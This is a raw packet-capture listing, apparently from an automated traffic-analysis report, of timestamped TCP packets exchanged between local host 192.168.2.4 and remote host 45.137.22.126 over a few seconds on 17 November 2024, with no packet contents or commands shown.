                                                                                                                                            Nov 17, 2024 03:07:11.426084995 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.426166058 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.426182032 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.426223993 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.426610947 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.430351019 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.430360079 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.430418968 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.431015968 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.431056023 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.431077003 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.431128025 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.431129932 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.431138039 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.431154966 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.431162119 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.431197882 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.431236982 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.472970963 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.473181963 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.521291018 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.521361113 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.569304943 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.569370985 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.616894960 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.616957903 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.668976068 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.669069052 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.720884085 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.720969915 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.769052029 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.769119024 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.816984892 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.817045927 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.864947081 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.865010023 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.913229942 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.913307905 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:11.965133905 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:11.965203047 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.013509035 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.013581038 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.019471884 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.019737959 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.019865990 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.025293112 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025321960 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025366068 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.025439978 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025468111 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025501966 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.025517941 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025541067 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.025544882 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025566101 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.025595903 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.025602102 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025629997 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025656939 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.025679111 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025681973 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.025707006 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025732994 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.025755882 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.025832891 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025861025 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025887012 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025890112 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.025914907 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025921106 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.025955915 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.025978088 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.025983095 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026005030 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026031971 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026032925 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026057959 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026077032 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026103973 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026103973 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026130915 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026154995 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026200056 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026212931 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026262999 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026268005 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026325941 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026326895 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026357889 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026391983 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026421070 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026428938 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026483059 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026484013 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026544094 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026576996 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026603937 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026633978 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026638031 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026679993 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026693106 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026705980 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026740074 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026746988 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026783943 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026798964 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026845932 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026851892 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.026873112 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.026915073 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.030553102 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.030607939 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.030849934 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.030908108 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.032552004 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.032608986 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.032659054 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.032712936 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.032733917 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.032783985 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.032783985 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.032814026 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.032867908 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.032877922 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.032906055 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.032928944 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.032954931 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.032955885 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.032984018 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033005953 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033030987 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033042908 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033057928 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033085108 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033088923 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033111095 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033114910 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033138037 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033157110 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033168077 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033184052 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033210993 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033216953 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033237934 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033245087 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033265114 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033268929 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033291101 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033292055 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033313036 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033334017 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033340931 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033369064 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033395052 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033399105 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033421040 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033447027 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033448935 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033474922 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033487082 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033509970 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033521891 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033529997 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033548117 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033575058 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033576965 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033601999 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.033628941 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.033652067 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.034918070 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.034981012 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035021067 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035080910 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035087109 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035119057 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035136938 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035182953 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035231113 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035233974 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035285950 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035296917 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035342932 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035355091 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035392046 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035392046 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035424948 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035459042 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035487890 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035490990 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035517931 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035537958 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035561085 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035640001 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035667896 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035691977 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035715103 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035729885 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035757065 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035780907 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035793066 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035804033 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035839081 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035847902 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035887957 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035906076 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035932064 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.035955906 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035980940 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.035993099 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036019087 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036041975 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036068916 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036098957 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036125898 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036151886 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036175013 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036179066 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036201954 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036226034 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036257982 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036308050 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036334038 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036362886 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036381006 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036387920 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036412001 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036427975 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036457062 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036513090 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036540031 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036562920 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036588907 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036603928 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036631107 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036652088 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036674023 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036680937 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036720037 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036732912 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036772013 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036775112 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036820889 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036827087 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036878109 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036885977 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036912918 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.036938906 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.036977053 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037008047 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037034035 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037065029 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037071943 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037091970 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037122011 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037127972 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037148952 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037172079 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037180901 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037198067 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037228107 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037229061 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037259102 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037278891 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037302971 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037306070 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037338018 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037354946 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037383080 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037405968 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037435055 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037460089 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037484884 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037491083 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037514925 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037537098 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037560940 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037561893 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037592888 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037609100 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037641048 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037676096 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037702084 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037739992 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037766933 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037794113 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037818909 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037842035 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037847996 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037868977 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037892103 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037914038 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037919044 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037945032 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.037966013 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.037991047 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.038741112 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.038769007 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.038795948 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.038813114 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.038821936 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.038868904 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.038880110 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.038930893 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.038950920 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.038978100 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039006948 CET4973755615192.168.2.445.137.22.126
